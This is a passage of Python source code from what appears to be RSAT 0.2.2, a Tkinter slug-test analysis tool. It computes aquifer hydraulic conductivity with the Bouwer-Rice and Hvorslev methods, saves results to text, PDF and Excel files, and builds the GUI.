self.ResultsK.iloc[0,0]=self.Kh_BR_FP
self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='g')
LegendList.append('Bouwer-Rice - range 0.20-0.30')
if V4.get()==True:
self.AqThick=float(AQTHICK.get())
self.LinearRegression(self.DFSlicedLogNormHead_RangeBR)
self.ResultsH0T0.iloc[0,1]=self.H01
self.ResultsH0T0.iloc[1,1]=self.T01
self.KhBouwerRice_PP()
self.ResultsK.iloc[0,1]=round(self.Kh_BR_PP, 5)
if V1.get()== False:
self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='g')
LegendList.append('Bouwer-Rice - range 0.20-0.30')
if V7.get()==True:
self.AqThick=float(AQTHICK.get())
self.re=float(RE.get())
self.LinearRegression(self.DFSlicedLogNormHead_RangeH)
self.LinearReg_Coeff.append(self.LinRegCoef[:])
self.ResultsH0T0.iloc[0,2]=self.H01
self.ResultsH0T0.iloc[1,2]=self.T01
self.KhHvorslev_FP()
self.ResultsK.iloc[0,2]=self.Kh_H_FP
self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='b')
LegendList.append('Hvorslev - range 0.15-0.25')
if V10.get()==True:
self.LinearRegression(self.DFSlicedLogNormHead_RangeH)
self.LinearReg_Coeff.append(self.LinRegCoef[:])
self.ResultsH0T0.iloc[0,3]=self.H01
self.ResultsH0T0.iloc[1,3]=self.T01
self.KhHvorslev_PP()
self.ResultsK.iloc[0,3]=self.Kh_H_PP
if V7.get()== False:
self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='b')
LegendList.append('Hvorslev - range 0.15-0.25')
if V2.get()==True:
self.LinearRegression(self.DFSlicedLogNormHead_Begin)
self.LinearReg_Coeff.append(self.LinRegCoef[:])
self.ResultsH0T0.iloc[2,0]=self.H01
self.ResultsH0T0.iloc[3,0]=self.T01
self.KhBouwerRice_FP()
self.ResultsK.iloc[1,0]=self.Kh_BR_FP
self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='y')
LegendList.append('Range 0.3-1')
if V5.get()==True:
self.AqThick=float(AQTHICK.get())
self.LinearRegression(self.DFSlicedLogNormHead_Begin)
self.ResultsH0T0.iloc[2,1]=self.H01
self.ResultsH0T0.iloc[3,1]=self.T01
self.KhBouwerRice_PP()
self.ResultsK.iloc[1,1]=self.Kh_BR_PP
if V2.get()== False:
self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='y')
LegendList.append('Range 0.30-1')
if V8.get()==True:
self.AqThick=float(AQTHICK.get())
self.re=float(RE.get())
self.LinearRegression(self.DFSlicedLogNormHead_Begin)
self.ResultsH0T0.iloc[2,2]=self.H01
self.ResultsH0T0.iloc[3,2]=self.T01
self.KhHvorslev_FP()
self.ResultsK.iloc[1,2]=self.Kh_H_FP
if (V2.get()== False) & (V5.get()== False):
self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='y')
LegendList.append('Range 0.3-1')
if V11.get()==True:
self.LinearRegression(self.DFSlicedLogNormHead_Begin)
self.ResultsH0T0.iloc[2,3]=self.H01
self.ResultsH0T0.iloc[3,3]=self.T01
self.KhHvorslev_PP()
self.ResultsK.iloc[1,3]=self.Kh_H_PP
if (V2.get()== False) & (V8.get()== False)& (V5.get()== False):
self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='y')
LegendList.append('Range 0.3-1')
if V3.get()==True:
self.LinearRegression(self.DFSlicedLogNormHead_All)
self.LinearReg_Coeff.append(self.LinRegCoef[:])
self.ResultsH0T0.iloc[4,0]=self.H01
self.ResultsH0T0.iloc[5,0]=self.T01
self.KhBouwerRice_FP()
self.ResultsK.iloc[2,0]=self.Kh_BR_FP
self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='m')
LegendList.append('All data')
if V6.get()==True:
self.AqThick=float(AQTHICK.get())
self.LinearRegression(self.DFSlicedLogNormHead_All)
self.ResultsH0T0.iloc[4,1]=self.H01
self.ResultsH0T0.iloc[5,1]=self.T01
self.KhBouwerRice_PP()
self.ResultsK.iloc[2,1]=self.Kh_BR_PP
if V3.get()== False:
self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='m')
LegendList.append('All data')
if V9.get()==True:
self.AqThick=float(AQTHICK.get())
self.re=float(RE.get())
self.LinearRegression(self.DFSlicedLogNormHead_All)
self.ResultsH0T0.iloc[4,2]=self.H01
self.ResultsH0T0.iloc[5,2]=self.T01
self.KhHvorslev_FP()
self.ResultsK.iloc[2,2]=self.Kh_H_FP
if (V3.get()== False) & (V6.get()== False):
self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='m')
LegendList.append('All data')
if V12.get()==True:
self.LinearRegression(self.DFSlicedLogNormHead_All)
self.ResultsH0T0.iloc[4,3]=self.H01
self.ResultsH0T0.iloc[5,3]=self.T01
self.KhHvorslev_PP()
self.ResultsK.iloc[2,3]=self.Kh_H_PP
if (V3.get()== False) & (V6.get()== False)& (V9.get()== False):
self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='m')
LegendList.append('All data')
plt.axis([self.DFSlicedNormHead_All.iloc[0,0],self.DFSlicedNormHead_All.iloc[-1,0],self.DFSlicedNormHead_All.iloc[-1,1],self.DFSlicedNormHead_All.iloc[0,1]])
plt.legend(LegendList, fontsize=11)
self.ResultsK=self.ResultsK.fillna(" \ ") # instead of nan, '\' will be displayed in the results table for the non-calculated values
self.TableResults()
except ValueError:
tk.messagebox.showerror("Warning", "The calculations cannot be performed! \nCheck if all needed parameters are given and in the correct (float) format")
# Batch calculation of multiple files, with the same parameters and the same calculation options => calculation formule
# no saving of H0+,T0+
def BatchCalc(self):
iterables=[self.listNamesRepMeas_H,['Best range','No full recovery','All data']] # dit is nog te veel
index = pd.MultiIndex.from_product(iterables)
self.ResultsKB_all=pd.DataFrame(np.nan,index=index,columns=['Bouwer-Rice, fully p.','Bouwer-Rice, partially p.','Hvorslev, fully p.','Hvorslev, partially p.'])
try:
# first the general things: get parameters
self.Aniso=float(ANISO.get())
self.d=float(D.get())
self.Le=float(LE.get())
self.rc=float(RC.get())
self.rw=float(RW.get())
for self.batchfile in range(0, len(self.listNamesRepMeas_TH)-1,2):
LegendList=['Measurements']
# slicing the normalized heads list to the desired ranges for the calculations and taking the logs that are used in the linear regression: (part of SplitPlotDataForCalc)
# first select the two colums corresponding to one measurement
self.DFSlicedNormHead_Rep_1a=self.DFSlicedNormHead_Rep.loc[:,[self.listNamesRepMeas_TH[self.batchfile],self.listNamesRepMeas_TH[self.batchfile+1]]]
self.DFSlicedNormHead_Rep_1=self.DFSlicedNormHead_Rep_1a[(self.DFSlicedNormHead_Rep_1a[self.listNamesRepMeas_TH[self.batchfile+1]]>=0.035)]
if (V3.get()==True) or (V6.get()==True) or (V9.get()==True) or (V12.get()==True):
self.DFSlicedLogNormHead_Rep_All=self.DFSlicedNormHead_Rep_1.copy() # copy() is needed for not overwriting the original dataframe
self.DFSlicedLogNormHead_Rep_All[self.listNamesRepMeas_TH[self.batchfile+1]]=self.DFSlicedLogNormHead_Rep_All[self.listNamesRepMeas_TH[self.batchfile+1]].map(lambda a: math.log(a))
if (V1.get()==True) or (V4.get()==True):
self.DFSlicedNormHead_Rep_RangeBR=self.DFSlicedNormHead_Rep_1[(self.DFSlicedNormHead_Rep_1[self.listNamesRepMeas_TH[self.batchfile+1]]>=0.2)&(self.DFSlicedNormHead_Rep_1[self.listNamesRepMeas_TH[self.batchfile+1]]<=0.3)]
self.DFSlicedLogNormHead_Rep_RangeBR=self.DFSlicedNormHead_Rep_RangeBR.copy()
self.DFSlicedLogNormHead_Rep_RangeBR[self.listNamesRepMeas_TH[self.batchfile+1]]=self.DFSlicedNormHead_Rep_RangeBR[self.listNamesRepMeas_TH[self.batchfile+1]].map(lambda a: math.log(a))
if (V7.get()==True) or (V10.get()==True):
self.DFSlicedNormHead_Rep_RangeH=self.DFSlicedNormHead_Rep_1[(self.DFSlicedNormHead_Rep_1[self.listNamesRepMeas_TH[self.batchfile+1]]>=0.15)&(self.DFSlicedNormHead_Rep_1[self.listNamesRepMeas_TH[self.batchfile+1]]<=0.25)]
self.DFSlicedLogNormHead_Rep_RangeH=self.DFSlicedNormHead_Rep_RangeH.copy()
self.DFSlicedLogNormHead_Rep_RangeH[self.listNamesRepMeas_TH[self.batchfile+1]]=self.DFSlicedNormHead_Rep_RangeH[self.listNamesRepMeas_TH[self.batchfile+1]].map(lambda a: math.log(a))
if (V2.get()==True) or (V5.get()==True) or (V8.get()==True) or (V11.get()==True):
self.DFSlicedNormHead_Rep_Begin=self.DFSlicedNormHead_Rep_1[(self.DFSlicedNormHead_Rep_1[self.listNamesRepMeas_TH[self.batchfile+1]]>=0.3)&(self.DFSlicedNormHead_Rep_1[self.listNamesRepMeas_TH[self.batchfile+1]]<=1)]
self.DFSlicedLogNormHead_Rep_Begin=self.DFSlicedNormHead_Rep_Begin.copy()
self.DFSlicedLogNormHead_Rep_Begin[self.listNamesRepMeas_TH[self.batchfile+1]]=self.DFSlicedNormHead_Rep_Begin[self.listNamesRepMeas_TH[self.batchfile+1]].map(lambda a: math.log(a))
self.BatchRegResults()
if V1.get()== True: # if this button is clicked, the calculations are done for the specific method (Bouwer-Rice/Hvorslev) and range (best range, all data, begin of the data)
self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_RangeBR)
self.KhBouwerRice_FP()
self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'Best range'),'Bouwer-Rice, fully p.']=self.Kh_BR_FP
self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='g')
LegendList.append('Bouwer-Rice - range 0.20-0.30')
if V4.get()==True:
self.AqThick=float(AQTHICK.get())
self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_RangeBR)
self.KhBouwerRice_PP()
self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'Best range'),'Bouwer-Rice, partially p.']=round(self.Kh_BR_PP, 10)
if V1.get()== False:
self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='g')
LegendList.append('Bouwer-Rice - range 0.20-0.30')
if V7.get()==True:
self.AqThick=float(AQTHICK.get())
self.re=float(RE.get())
self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_RangeH)
self.KhHvorslev_FP()
self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'Best range'),'Hvorslev, fully p.']=round(self.Kh_H_FP,10)
self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='b')
LegendList.append('Hvorslev - range 0.15-0.25')
if V10.get()==True:
self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_RangeH)
self.KhHvorslev_PP()
self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'Best range'),'Hvorslev, partially p.']=round(self.Kh_H_PP,10)
if V7.get()== False:
self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='b')
LegendList.append('Hvorslev - range 0.15-0.25')
if V2.get()==True:
self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_Begin)
self.KhBouwerRice_FP()
self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'No full recovery'),'Bouwer-Rice, fully p.']=round(self.Kh_BR_FP,10)
self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='y')
LegendList.append('Range 0.3-1')
if V5.get()==True:
self.AqThick=float(AQTHICK.get())
self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_Begin)
self.KhBouwerRice_PP()
self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'No full recovery'),'Bouwer-Rice, partially p.']=round(self.Kh_BR_PP,10)
if V2.get()== False:
self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='y')
LegendList.append('Range 0.30-1')
if V8.get()==True:
self.AqThick=float(AQTHICK.get())
self.re=float(RE.get())
self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_Begin)
self.KhHvorslev_FP()
self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'No full recovery'),'Hvorslev, fully p.']=round(self.Kh_H_FP,10)
if (V2.get()== False) & (V5.get()== False):
self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='y')
LegendList.append('Range 0.3-1')
if V11.get()==True:
self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_Begin)
self.KhHvorslev_PP()
self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'No full recovery'),'Hvorslev, partially p.']=round(self.Kh_H_PP,10)
if (V2.get()== False) & (V8.get()== False)& (V5.get()== False):
self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='y')
LegendList.append('Range 0.3-1')
if V3.get()==True:
self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_All)
self.KhBouwerRice_FP()
self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'All data'),'Bouwer-Rice, fully p.']=round(self.Kh_BR_FP,10)
self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='m')
LegendList.append('All data')
if V6.get()==True:
self.AqThick=float(AQTHICK.get())
self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_All)
self.KhBouwerRice_PP()
self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'All data'),'Bouwer-Rice, partially p.']=round(self.Kh_BR_PP,10)
if V3.get()== False:
self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='m')
LegendList.append('All data')
if V9.get()==True:
self.AqThick=float(AQTHICK.get())
self.re=float(RE.get())
self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_All)
self.KhHvorslev_FP()
self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'All data'),'Hvorslev, fully p.']=round(self.Kh_H_FP,10)
if (V3.get()== False) & (V6.get()== False):
self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='m')
LegendList.append('All data')
if V12.get()==True:
self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_All)
self.KhHvorslev_PP()
self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'All data'),'Hvorslev, partially p.']=round(self.Kh_H_PP,10)
if (V3.get()== False) & (V6.get()== False)& (V9.get()== False):
self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='m')
LegendList.append('All data')
# settings for regression figure
self.ax6.axis([self.DFSlicedNormHead_Rep_1.iloc[0,0],self.DFSlicedNormHead_Rep_1.iloc[-1,0],self.DFSlicedNormHead_Rep_1.iloc[-1,1],self.DFSlicedNormHead_Rep_1.iloc[0,1]])
plt.legend(LegendList, fontsize=11)
# save figure to pdf (one per measurement)
self.PlotRegRes_B.savefig(self.listNamesRepMeas_TH[self.batchfile+1] + '_RegressionPlot' + '.pdf', bbox_inches='tight')
self.ResultsKB_all=self.ResultsKB_all.fillna(" \ ") # instead of nan, '\' will be displayed in the results table for the non-calculated values
# save K results to excel
filenameResult_Batch=tk.filedialog.asksaveasfilename(title= 'Save as', confirmoverwrite=True, initialdir=self.newDirectory)
self.ResultsKB_all.to_excel(filenameResult_Batch + '_Kh.xlsx')
except ValueError:
tk.messagebox.showerror("Warning", "The calculations cannot be performed! \nCheck if all needed parameters are given and in the correct (float) format. \nThere might be calculation methods which are not applicable.")
# save the hydraulic conductivity, H0 and T0 results in a text file and the regression figure as pdf
def SaveResults(self):
# making a text file with the results and a summary of the parameters
filenameResult=tk.filedialog.asksaveasfilename(title= 'Save as', confirmoverwrite=True, initialdir=self.newDirectory)
logText=[]
logText='\n'.join(['____________________________________________________________\n', ' Logfile Slug Test Analysis Script' , '____________________________________________________________', ' ','RSAT 0.2.2' ,' '.join(['Time:',time.strftime("%a, %d %b %Y %H:%M:%S ")]), 'Filename: '+self.filename+'\n', 'Units: same as observation data. \n'])
logText = logText + '\nMinimal/maximal head: '+ '%.2f'%self.StartHead + ' [L]\n'
logText = logText + 'Equilibrium Head: '+ '%.2f'%self.BaseLevel + ' [L]\n' + 'Initial Displacement H0: '+ '%.2f'%self.H0 + ' [L]\n\n'
# write the parameters
logText= logText + '____________________________________________________________\n\n' +' SLUG TEST CHARACTERISTICS\n'+'____________________________________________________________\n\n'+ 'Rc: '+'%.5f' % (self.rc)+' [L]\n'+'Rw: '+'%.5f' % (self.rw)+' [L]\n' + 'd: '+ '%.5f'%(self.d) + ' [L]\n'+ 'Le: '+ '%.5f' %(self.Le)+ ' [L]\n\n'
logText= logText +'____________________________________________________________\n\n' + ' AQUIFER CHARACTERISTICS\n'+'____________________________________________________________\n\n' + 'Aquifer thickness: '+'%.5f' % (self.AqThick) + ' [L]\n' + 'Anisotropy ratio Kh/Kv: ' + '%.5f'%(self.Aniso) +' [-] \n\n'
#write the results for Bouwer & Rice
if (V1.get()== True) or (V2.get()== True) or (V3.get()== True):
logText = logText + '____________________________________________________________\n\n' +' BOUWER & RICE - fully penetrating \n'+'____________________________________________________________\n\n'
if V1.get()== True:
logText = logText + 'a) Calculation based on normalized head data in interval 0.20-0.30:\n\n' + 'H0+ = '+ '%.2f'%(self.ResultsH0T0.iloc[0,0]) + ' [L]\n' + 'T0+ = ' + '%.1f'%(self.ResultsH0T0.iloc[1,0]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[0,0] + ' [L/T]\n\n'
if V2.get()== True:
logText = logText + 'b) Calculation based on normalized head data in interval 0.3-1:\n\n' + 'H0+ = '+ '%.2f'%(self.ResultsH0T0.iloc[2,0]) + ' [L]\n' + 'T0+ = ' + '%.1f'%(self.ResultsH0T0.iloc[3,0]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[1,0] + ' [L/T]\n\n'
if V3.get()==True:
logText = logText + 'c) Calculation based on all head data:\n\n' + 'H0 = '+ '%.2f'%(self.ResultsH0T0.iloc[4,0]) + ' [L]\n' + 'T0 = ' + '%.1f'%(self.ResultsH0T0.iloc[5,0]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[2,0] + ' [L/T]\n\n'
if (V4.get()== True) or (V5.get()== True) or (V6.get()== True):
logText = logText +'____________________________________________________________\n\n' + ' BOUWER & RICE - partially penetrating \n'+'____________________________________________________________\n\n'
if V4.get()== True:
logText = logText + 'a) Calculation based on normalized head data in interval 0.20-0.30:\n\n' + 'H0+ = '+ '%.2f'%(self.ResultsH0T0.iloc[0,1]) + ' [L]\n' + 'T0+ = ' + '%.1f'%(self.ResultsH0T0.iloc[1,1]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[0,1] + ' [L/T]\n\n'
if V5.get()== True:
logText = logText + 'b) Calculation based on normalized head data in interval 0.3-1:\n\n' + 'H0+ = '+ '%.2f'%(self.ResultsH0T0.iloc[2,1]) + ' [L]\n' + 'T0+ = ' + '%.1f'%(self.ResultsH0T0.iloc[3,1]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[1,1] + ' [L/T]\n\n'
if V6.get()==True:
logText = logText + 'c) Calculation based on all head data:\n\n' + 'H0 = '+ '%.2f'%(self.ResultsH0T0.iloc[4,1]) + ' [L]\n' + 'T0 = ' + '%.1f'%(self.ResultsH0T0.iloc[5,1]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[2,1] + ' [L/T]\n\n'
if (V10.get()== True) or (V11.get()== True) or (V12.get()== True):# see above
logText = logText +'____________________________________________________________\n\n' + 'HVORSLEV - Fully penetrating \n'+'____________________________________________________________\n\n'
if V10.get()== True:
logText = logText + 'a) Calculation based on normalized head data in interval 0.15-0.25:\n\n' + 'H0+ = '+ '%.2f'%(self.ResultsH0T0.iloc[0,3]) + ' [L]\n' + 'T0+ = ' + '%.1f'%(self.ResultsH0T0.iloc[1,3]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[0,3] + ' [L/T]\n\n'
if V11.get()== True:
logText = logText + 'b) Calculation based on normalized head data in interval 0.3-1:\n\n' + 'H0+ = '+ '%.2f'%(self.ResultsH0T0.iloc[2,3]) + ' [L]\n' + 'T0+ = ' + '%.1f'%(self.ResultsH0T0.iloc[3,3]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[1,3] + ' [L/T]\n\n'
if V12.get()==True:
logText = logText + 'c) Calculation based on all head data:\n\n' + 'H0 = '+ '%.2f'%(self.ResultsH0T0.iloc[4,3]) + ' [L]\n' + 'T0 = ' + '%.1f'%(self.ResultsH0T0.iloc[5,3]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[2,3] + ' [L/T]\n\n'
# write the results for hvorslev-partially penetrating
if (V7.get()== True) or (V8.get()== True) or (V9.get()== True):# see above
logText = logText +'____________________________________________________________\n\n' + ' HVORSLEV - Partially penetrating\n'+'____________________________________________________________\n\n'
if V7.get()== True:
logText = logText + 'a) Calculation based on normalized head data in interval 0.15-0.25:\n\n' + 'H0+ = '+ '%.2f'%(self.ResultsH0T0.iloc[0,2]) + ' [L]\n' + 'T0+ = ' + '%.1f'%(self.ResultsH0T0.iloc[1,2]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[0,2] + ' [L/T]\n\n'
if V8.get()== True:
logText = logText + 'b) Calculation based on normalized head data in interval 0.3-1:\n\n' + 'H0+ = '+ '%.2f'%(self.ResultsH0T0.iloc[2,2]) + ' [L]\n' + 'T0+ = ' + '%.1f'%(self.ResultsH0T0.iloc[3,2]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[1,2] + ' [L/T]\n\n'
if V9.get()==True:
logText = logText + 'c) Calculation based on all head data:\n\n' + 'H0 = '+ '%.2f'%(self.ResultsH0T0.iloc[4,2]) + ' [L]\n' + 'T0 = ' + '%.1f'%(self.ResultsH0T0.iloc[5,2]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[2,2] + ' [L/T]\n\n'
with open(filenameResult, 'w') as output:
output.write(logText)
# saving a pdf with the regression plots
self.PlotRegRes.savefig(filenameResult + '_RegressionPlot' + '.pdf', bbox_inches='tight')
# save the results table to an excel
self.ResultsK.to_excel(filenameResult+ '_K.xlsx')
###############################################################################
###################################### MAIN ###################################
###############################################################################
################ creating GUI, structure, title and refer to authors ##########
GUI = tk.Tk()
GUI.configure(background= '#15344E')
GUI.title('RSAT 0.2.2')
GUI.geometry('1070x700')
i=8
j=15
tk.Label(GUI, text='RSAT 0.2.2 - Rising head Slug test Analysis Tool',font=("Helvetica", "18"), fg='white',height='3',background='#15344E').grid(row=i-8, column=j, columnspan=7)
tk.Label(GUI, text='Authors: Annabel Vaessens and Gert Ghysels. License: MIT',font=("Helvetica", "8"),fg='white', background='#15344E').grid(row=i+16, column=j+3, columnspan=10, sticky='W')
tk.Label(GUI, text=' ', width=10,fg='white', background='#15344E').grid(row=i, column=j+2)
tk.Label(GUI, text=' ', width=10,fg='white', background='#15344E').grid(row=i, column=j+1)
tk.Label(GUI, text=' ', width=8, fg='white', background='#15344E').grid(row=i, column=j-1)
#tk.Label(GUI, text=' ', height=1, fg='white', background='#15344E').grid(row=i+5, column=j, columnspan=7)
tk.Label(GUI, text=' ', height=1, fg='white', background='#15344E').grid(row=i+3, column=j, columnspan=7)
tk.Label(GUI, text=' ', height=1, fg='white', background='#15344E').grid(row=i+12, column=j-1)
tk.Label(GUI, text=' ', height=1, fg='white', background='#15344E').grid(row=i+15, column=j+3, columnspan=7)
tk.Label(GUI, text='', width=13, fg='white', background='#15344E').grid(row=i-1, column=4+j) # set width of column 4+j to 13
p=Program() # to make the class Program work in the main
########################## FALLING VS RISING HEAD #############################
tk.Label(GUI, text='Falling or rising head slug test', font=("Helvetica", "14"), fg='white',background='#15344E').grid(row=i-7, column=j, columnspan=1, sticky='W')
STlabel=tk.StringVar()
STlabel.set('F')
#tk.Checkbutton(GUI, variable=STlabel, indicatoron=0, width=18, textvariable=STlabel, onvalue='Falling head', offvalue='Rising head', font= ("Helvetica", "10",'bold'),foreground='white', activebackground='#2A6496' , background='#2A6496').grid(row=i-6, column=j)
modes=[('Falling head', 'F', 0),('Rising head', 'R',1)]
for text, mode, number in modes:
b = tk.Radiobutton(GUI, text=text,indicatoron=0, variable=STlabel, width=18, value=mode, background='#2A6496', fg='black', font=("Helvetica", "10", "bold"))
b.grid(row=i-6+number, column=j)
########################## DIRECTORY AND OPEN FILE ############################
tk.Label(GUI, text='Working directory & data',font=("Helvetica", "14"), fg='white',background='#15344E').grid(row=i-3, column=j, columnspan=1, sticky='W')
# button to change directory
tk.Button(GUI, text="Output directory", command=p.newDirectory, font=("Helvetica", "10",'bold'), fg='white',width=18, bg='#2A6496').grid(row=i-2, column=j)
# button to import a file
tk.Button(GUI, text="Data file", font=("Helvetica", "10",'bold'), fg='white', command=p.OpenFile,width=18, bg='#2A6496').grid(row=i, column=j)
# button to plot a head (L) - time (s) curve in a pop-up window
tk.Button(GUI,text="Plot", command=p.PlotDataSeperateBox, font=("Helvetica", "10",'bold'), fg='white', width=18, bg='#2A6496').grid(row=i+2, column=j)
########################### SPLITTING RAW DATA ################################
# an entry to enter how many measurements there are in the imported file
tk.Label(GUI, text='Splitting raw data',fg='white', font=("Helvetica", "14"), background='#15344E').grid(row=i+4, column=j, columnspan=1, sticky='W')
tk.Label(GUI, text=' # measurements: ',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i+5, column=j, sticky='W')
NM=tk.IntVar()
NumberMeas=tk.Entry(GUI,textvariable=NM, width=8).grid(row=i+5, column=j, sticky='E')
# button to define the boundaries of individual measurements in the clickable graph
tk.Button(GUI, text='Boundaries', command=p.ClickableGraph, font=("Helvetica", "10",'bold'), fg='white', width=18, bg='#2A6496').grid(row=i+7, column=j)
# button to plit the data files into individual measurements
tk.Button(GUI, text='Split data',command=p.SplitRawData, font=("Helvetica", "10",'bold'), fg='white', width=18, bg='#2A6496').grid(row=i+8, column=j)
########################### CHECK REPEATABILITY ###############################
# label and button to open multiple files in order to check repeatability on normalized head - time curves
tk.Label(GUI,text='Normalized head curves',fg='white', font=("Helvetica", "14"), background='#15344E').grid(row=i+10, column=j,columnspan=1, sticky='W')
tk.Button(GUI, text='Choose files', command=p.RepeatabilityOpen, font=("Helvetica", "10",'bold'), fg='white', width=18, bg='#194469').grid(row=i+11, column=j)
# button to plot normhead-time curves
tk.Button(GUI, text='Versus time - linear', command= p.PlotNormHead_Time ,font=("Helvetica", "10",'bold'), fg='white', width=18, bg='#194469').grid(row=i+12, column=j)
# button to plot normhead-log(time) curves
tk.Button(GUI, text='Versus time - semilog', command= p.PlotNormHead_LogTime ,font=("Helvetica", "10",'bold'), fg='white', width=18, bg='#194469').grid(row=i+13, column=j)
# button for batch calculation
# tk.Label(GUI,text='Batch calculation',fg='white', font=("Helvetica", "12"), background='#15344E').grid(row=i+12, column=j,columnspan=1, sticky='W')
tk.Button(GUI, text='Batch calculation', command=p.BatchCalc, font=("Helvetica", "10",'bold'), fg='white', width=14, bg='#194469').grid(row=i+13, column=4+j, columnspan=3)
###################### PARAMETERS for calculations #############################
# aquifer characteristics entries
tk.Label(GUI, text='Aquifer characteristics',fg='white', font=("Helvetica", "14"), background='#15344E').grid(row=i, column=3+j,columnspan=3, sticky='W')
tk.Label(GUI, text='Anisotropy Kh/Kv',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i+1, column=3+j, sticky='W')
tk.Label(GUI, text='[-]',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i+1, column=5+j, sticky='W')
ANISO=tk.StringVar()
tk.Entry(GUI, textvariable=ANISO, width=8).grid(row=i+1, column=4+j)
